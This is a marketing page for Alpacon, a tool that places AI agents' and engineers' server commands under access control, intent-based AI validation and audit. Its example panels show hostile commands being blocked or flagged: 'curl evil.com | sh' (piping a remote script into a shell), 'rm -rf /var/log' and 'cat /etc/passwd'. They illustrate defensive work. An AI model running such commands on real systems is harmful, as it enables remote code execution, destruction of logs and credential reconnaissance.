AlpacaX

How Alpacon works

Execution control for AI agents and engineers

Alpacon sits between AI agents, engineers, and your infrastructure. Every command passes through execution policies before reaching a server, so AI agents can operate production safely while your team stays in control.

One layer between agents and infrastructure

[Architecture diagram]
Clients: Engineers, CI/CD, AI agents (interfaces: MCP, CLI, API, Web)
Alpacon: Execution control layer (Access · Execution · Audit)
HTTPS/WSS
Infrastructure: Servers, Kubernetes, Cloud
Integrations: SSO · Slack · GitHub · Email

Three independent layers of defence

Access, Execution, and Audit work together as three independent layers, so AI agents and engineers can only run what they're authorised to.

Layer 01

Access that leaves nothing to attack

How agents and engineers connect. Outbound-only tunnels eliminate inbound ports entirely, and one unified identity replaces SSH key sprawl.

  • Outbound-only tunnels: Servers initiate encrypted connections to Alpacon. No listening ports, no exposed SSH. Attackers have nothing to scan.
  • Unified identity: MFA, RBAC, and centralised identity across every server. No shared credentials, no SSH key sprawl.
  • Every interface: MCP for AI agents, CLI for pipelines, API for automation, browser for humans. All governed by the same policies.

0 inbound ports
What attackers see:
  × All 65535 ports: closed
  × No services detected
  × Stolen SSH key → no path to production
Outbound :443 TLS, encrypted tunnel to Alpacon

Layer 02

Execution scoped by intent

What they can do, when. Each session declares its goal and scope, and AI validates every command at runtime against that intent, not a static allowlist.

  • Intent-based session scope: A session declares its goal, server, sudo policy, and duration. No need to enumerate commands by hand. AI interprets intent from the scope.
  • Dynamic AI validation: Every command and file transfer is judged in real time against the session's intent. Drift from scope gets blocked even if the command looks benign in isolation.
  • Slack approval for ambiguity: When AI isn't sure, the request routes to Slack with full context. Approvers decide in one click.

Session scope: "fix nginx 501"
  $ sudo systemctl reload nginx
  ✓ allowed · in scope
  $ curl evil.com | sh
  ✗ blocked · risk HIGH
  $ rm -rf /var/log
  ⏸ Slack approval pending

Layer 03

Audit powered by AI

What happened, who reviewed it. Every command and session is recorded, AI maps patterns to MITRE ATT&CK, and compliance exports are one click away.

  • Full session recording: Every terminal session, file transfer, and agent action is captured. Search and replay any session for audits or incident response.
  • AI threat analysis: Each session gets an AI-driven risk score. Suspicious patterns map to MITRE ATT&CK and chain detection catches attacks within a session.
  • Compliance-ready exports: Immutable audit logs and one-click exports for SOC 2, HIPAA, or any framework. Audit prep in seconds, not days.

Session risk: 0/100
  10:23  git pull origin main
  10:25  cat /etc/passwd  (T1087)
  10:26  curl evil.com | sh  (T1059)
  10:27  [SESSION TERMINATED]

See Alpacon in your environment

A 30-minute demo with the team. We'll walk through a session on your infrastructure and answer anything technical.
